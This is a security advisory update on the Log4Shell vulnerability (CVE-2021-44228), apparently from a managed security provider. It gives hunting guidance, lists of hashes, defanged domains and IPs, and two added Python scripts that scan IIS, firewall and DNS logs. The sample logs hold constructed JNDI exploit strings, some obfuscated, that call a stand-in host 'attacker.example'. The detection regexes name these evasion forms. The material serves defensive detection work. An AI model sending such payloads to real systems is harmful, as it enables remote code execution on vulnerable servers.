UPDATE: Log4Shell – CVE-2021-44228 – Apache Log4j Vulnerability

Priority: Critical

Executive Summary:

ITC Secure is continuing to monitor for any alerts that could indicate an incident related to the recent Log4j vulnerability. ITC has carried out threat hunting across the log sources we ingest into Sentinel for signs of initial compromise, and has reviewed endpoint activity for the suspicious process executions that follow a successful exploit. ITC will continue these threat hunting activities and will escalate any findings.

We are conscious that we may not have coverage of all log sources within your estate, so, as at the time of preparing this report, we have provided below further details and IOCs that your internal Network and Security Teams can use to assist their own investigation.

Specific guidance published by Microsoft can be found in the following post:

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation – Microsoft Security Blog

Further Guidance at the time of preparing this report:

IOCs:

The exploit string lands in whichever request field the vulnerable application passes to Log4j, so it is most often seen in the User-Agent header but can equally appear in the URI, query string, Referer or other headers. Where IIS sits in front of a Java application, the IIS server logs should be reviewed for the following strings in the user agent and other request fields:
“jndi:ldap”
“Basic/Command/Base64”

Note that attackers also use other JNDI protocols (for example ldaps, rmi and dns) and nest lookups such as ${${lower:j}ndi:...} to defeat a search for the literal text, so a search for only the two strings above will miss some attempts.

Finding the above strings in the IIS logs does not by itself mean that a compromise has occurred, but it does show that someone has attempted to exploit the server. If the server was vulnerable to CVE-2021-44228 the attempt may have succeeded. Please contact the ITC SOC with any references to these strings, together with the targeted server, so that we can investigate further.
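The hunt described above, as an added Python example that is not ITC's tooling and not part of the original advisory: it parses the IIS W3C extended log format from its `#Fields:` header, percent-decodes and collapses the nested `${lower:...}` / `${::-x}` lookups that hide the word `jndi`, flags any JNDI protocol rather than only `ldap`, and decodes the base64 command carried in the `/Basic/Command/Base64/` path used by common JNDI exploit servers. The log excerpt and the host `attacker.example` are constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed IIS W3C extended log excerpt (not from the original advisory). IIS writes one
# space-separated record per request and replaces spaces inside a field with '+'.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-12-11 10:15:32 10.0.0.5 GET /index.html - 443 - 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0)+Firefox/95.0 - 200 0 0 15
2021-12-11 10:16:01 10.0.0.5 GET / - 443 - 198.51.100.7 ${jndi:ldap://attacker.example:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZA==} - 200 0 0 9
2021-12-11 10:16:44 10.0.0.5 GET /login x=${${lower:j}ndi:${lower:l}dap://attacker.example:1389/a} 443 - 198.51.100.8 curl/7.79.1 - 404 0 2 3
2021-12-11 10:17:02 10.0.0.5 GET /api - 443 - 198.51.100.9 - %24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2Fattacker.example%2Fx%7D 200 0 0 4
"""

# Log4j lookup forms attackers wrap around "jndi" to defeat naive string matching.
# Each alternative captures the literal the lookup resolves to.
_LOOKUP_RE = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"       # ${lower:j}   -> j
    r"|\$\{::-([^${}]*)\}"                   # ${::-j}      -> j
    r"|\$\{[A-Za-z]+:[^${}]*:-([^${}]*)\}"   # ${env:X:-j}  -> j (default-value form)
)
# Any JNDI protocol, not only ldap; case is ignored so ${upper:...} tricks still match.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)
_B64_CMD_RE = re.compile(r"Basic/Command/Base64/([A-Za-z0-9+/=]+)")

# Request fields that carry attacker-controlled input; cs-username is included because
# some applications log the HTTP auth username through Log4j as well.
WATCHED_FIELDS = ("cs-uri-stem", "cs-uri-query", "cs(User-Agent)", "cs(Referer)", "cs-username")


def normalize(value: str) -> str:
    """Undo up to two layers of percent-encoding, then resolve each obfuscating lookup to its
    argument until nothing changes (bounded so hostile input cannot loop forever)."""
    text = unquote(unquote(value))
    for _ in range(10):
        new = _LOOKUP_RE.sub(lambda m: next(g for g in m.groups() if g is not None), text)
        if new == text:
            break
        text = new
    return text


def decode_command(text: str):
    """Recover the base64 command from a '/Basic/Command/Base64/<b64>' exploit-server path."""
    m = _B64_CMD_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def parse_iis_w3c(text: str):
    """Yield one dict per request record, with column names taken from the #Fields: header."""
    fields = []
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#"):
            continue
        cols = raw.split(" ")
        if len(cols) != len(fields):
            continue  # truncated or malformed record: skip rather than mis-assign columns
        yield dict(zip(fields, cols))


def hunt(log_text: str):
    """Return one hit per (record, field) where a JNDI lookup survives normalisation."""
    hits = []
    for rec in parse_iis_w3c(log_text):
        for field in WATCHED_FIELDS:
            raw = rec.get(field, "-")
            if raw == "-":
                continue
            norm = normalize(raw)
            m = _JNDI_RE.search(norm)
            if not m:
                continue
            hits.append({
                "time": f"{rec['date']} {rec['time']}",
                "client_ip": rec["c-ip"],
                "field": field,
                "protocol": m.group(1).lower(),
                "obfuscated": norm != raw,      # True when decoding/lookup collapsing was needed
                "normalized": norm,
                "command": decode_command(norm),
            })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_IIS_LOG):
        print(hit)
```

Run it against a real log by reading the file into `hunt()`; a hit only proves an attempt, so the `client_ip`, targeted server and any decoded `command` are what to hand to the SOC for the follow-up checks on the host.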

Hashes:

These SHA-256 hashes have been identified as being involved in the recent Log4j attacks. If you have the means to search for hashes through anti-virus or similar tooling, consider searching your environment for them. If found, contact the ITC SOC for further investigation. If you can block the hashes, consider doing so, but understand that attackers regularly change their payloads to avoid detection through these IOCs, so an absence of matches is not evidence that no payload was delivered.

8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef

6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b

c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26

776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00

8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81

2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984

0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049

19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d

2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec

39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129

5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28

6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b

63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9

6a8965a0f897539cc06fefe65d1a4c5fa450d002d1a9d5d69d2b48f697ee5c05

715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7

a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce

b3a6fe5bc3883fd26c682bb6271a700b8a6fe006ad8df6c09cc87530fcd3a778

b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0

c154d739cab62e958944bb4ac5ebad6e965a0442a3f1c1d99d56137e3efa8e40

c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799

e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80

fe98548300025a46de1e06b94252af601a215b985dad31353596af3c1813efb0

Domains:

ITC has carried out and will continue to carry out threat hunting using the below domains, which have been identified as being involved with CVE-2021-44228. Due to the nature of this attack, domains that host malicious payloads will change frequently, either to avoid detection or because of takedowns. The entries are defanged with [.] and should be refanged before searching.

x41[.]me

m3[.]wtf

cuminside[.]club

abrahackbugs[.]xyz

pwn[.]af

rce[.]ee

psc4fuel[.]com

rs3c1[.]com

leakix[.]net

IPs:

ITC has carried out and will continue to threat hunt using the below IP addresses against firewall logs, where available. Several of the listed addresses fall in ranges widely used as Tor exit nodes, so a match shows exploitation attempts from an anonymised source rather than a specific actor; treat any hit as a prompt to check the targeted host, not as attribution. The entries are defanged with [.] and should be refanged before searching.

109.237.96[.]124

185.100.87[.]202

213.164.204[.]146

185.220.101[.]146

171.25.193[.]20

178.17.171[.]102

45.155.205[.]233

171.25.193[.]25

171.25.193[.]77

171.25.193[.]78

185.220.100[.]242

185.220.101[.]39

18.27.197[.]252

89.234.182[.]139

104.244.79[.]6

164.52.212[.]196

193.196.53[.]232

121.5.113[.]11

178.176.202[.]121

178.176.203[.]190

197.246.171[.]83

42.192.11[.]41

45.130.229[.]168

18.228.7[.]109

45.33.47[.]240

80.78.254[.]57

176.32.33[.]14

137.184.61[.]190

205.185.115[.]217

104.244.74[.]57

104.244.76[.]170

107.189.12[.]135

116.24.67[.]213

134.122.34[.]28

137.184.102[.]82

122.161.50[.]23

137.184.106[.]119

142.93.34[.]250

143.198.32[.]72

143.198.45[.]117

147.182.167[.]165

147.182.169[.]254

147.182.219[.]9

151.115.60[.]113

159.65.155[.]208

159.65.58[.]66

164.90.199[.]216

167.99.164[.]201

167.99.172[.]213

167.99.172[.]58

178.62.79[.]49

181.214.39[.]2

185.220.101[.]134

185.220.101[.]138

185.220.101[.]141

185.220.101[.]143

185.220.101[.]144

185.220.101[.]145

185.220.101[.]147

185.220.101[.]149

185.220.101[.]154

185.220.101[.]156

185.220.101[.]157

185.220.101[.]158

185.220.101[.]160

185.220.101[.]161

185.220.101[.]163

185.220.101[.]171

185.220.101[.]172

185.220.101[.]175

185.220.101[.]177

185.220.101[.]180

185.220.101[.]181

185.220.101[.]182

185.220.101[.]185

185.220.101[.]186

185.220.101[.]189

185.220.101[.]191

193.189.100[.]203

194.48.199[.]78

195.19.192[.]26

195.254.135[.]76

195.54.160[.]149

23.129.64[.]131

185.38.175[.]132

188.166.122[.]43

188.166.48[.]55

188.166.92[.]228

23.129.64[.]146

23.129.64[.]148

45.153.160[.]131

46.182.21[.]248

54.173.99[.]121

62.102.148[.]69

62.76.41[.]46

68.183.198[.]247

68.183.44[.]143

72.223.168[.]73

81.17.18[.]60

92.63.197[.]53

164.52.53[.]163

185.220.100[.]240

198.98.60[.]19

86.109.208[.]194

41.203.140[.]114

49.7.224[.]217

195.251.41[.]139

189.188.33[.]125
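The domain, IP and hash lists above are defanged and mixed in type, so a practitioner usually wants one small tool that refangs them, classifies each entry, and then checks firewall and DNS log lines and file contents against them. The following Python script is an added example and not ITC's tooling; the log lines are constructed, and the short IOC excerpt it embeds is taken from the lists above. Hostname matching is done on label boundaries so that a subdomain of a listed domain is caught while a look-alike such as notx41.me is not.

```python
import hashlib
import ipaddress
import re
from typing import Dict, List, Optional, Set

# Constructed excerpt in the advisory's defanged format, using a few entries from the lists above.
IOC_TEXT = """
x41[.]me
rce[.]ee
185.220.101[.]146
109.237.96[.]124
8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef
"""

# Constructed syslog-style firewall and DNS lines; not from any real estate.
SAMPLE_LOGS = [
    "Dec 11 10:16:05 fw01 kernel: IN=eth0 OUT= SRC=185.220.101.146 DST=10.0.0.5 PROTO=TCP DPT=443",
    "Dec 11 10:16:07 app01 java: outbound connect to rce.ee:1389 from 10.0.0.5",
    "Dec 11 10:16:09 dns01 named: client 10.0.0.5 query: cdn.x41.me IN A",
    "Dec 11 10:17:00 fw01 kernel: IN=eth0 OUT= SRC=198.51.100.20 DST=10.0.0.5 PROTO=TCP DPT=443",
    "Dec 11 10:17:30 dns01 named: client 10.0.0.6 query: notx41.me IN A",
]

_SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
_DOMAIN_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")
_IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


def refang(ioc: str) -> str:
    """Turn the defanged form used in advisories back into a searchable value."""
    return ioc.strip().replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http").lower()


def classify(ioc: str) -> str:
    """Decide which list a refanged IOC belongs in: sha256, ip, domain or unknown."""
    if _SHA256_RE.match(ioc):
        return "sha256"
    try:
        ipaddress.ip_address(ioc)
        return "ip"
    except ValueError:
        pass
    return "domain" if _DOMAIN_RE.match(ioc) else "unknown"


def load_iocs(text: str) -> Dict[str, Set[str]]:
    """Parse a defanged IOC list (one entry per line) into per-type sets."""
    iocs: Dict[str, Set[str]] = {"ip": set(), "domain": set(), "sha256": set(), "unknown": set()}
    for line in text.splitlines():
        if line.strip():
            value = refang(line)
            iocs[classify(value)].add(value)
    return iocs


def matching_domain(host: str, domains: Set[str]) -> Optional[str]:
    """Return the listed domain that equals the host or is a parent of it on a label
    boundary (cdn.x41.me -> x41.me). A bare suffix match is never used, so notx41.me
    does not match x41.me."""
    labels = host.lower().split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in domains:
            return candidate
    return None


def scan_lines(lines: List[str], iocs: Dict[str, Set[str]]) -> List[dict]:
    """Extract IPv4 addresses and hostnames from free-text log lines and match them."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in _IPV4_RE.findall(line):
            if ip in iocs["ip"]:
                hits.append({"line": n, "kind": "ip", "ioc": ip, "observed": ip})
        for host in _HOST_RE.findall(line):
            parent = matching_domain(host, iocs["domain"])
            if parent:
                hits.append({"line": n, "kind": "domain", "ioc": parent, "observed": host})
    return hits


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def match_hash(data: bytes, iocs: Dict[str, Set[str]]) -> Optional[str]:
    """Return the matching SHA-256 IOC for a file's bytes, or None."""
    digest = sha256_hex(data)
    return digest if digest in iocs["sha256"] else None


if __name__ == "__main__":
    loaded = load_iocs(IOC_TEXT)
    for hit in scan_lines(SAMPLE_LOGS, loaded):
        print(hit)
```

To use the full lists, paste the Domains, IPs and Hashes sections into `IOC_TEXT` as they appear in this report, feed your exported firewall or DNS log lines to `scan_lines()`, and call `match_hash()` on the bytes of any suspicious file; the Tor-exit caveat above still applies to IP matches.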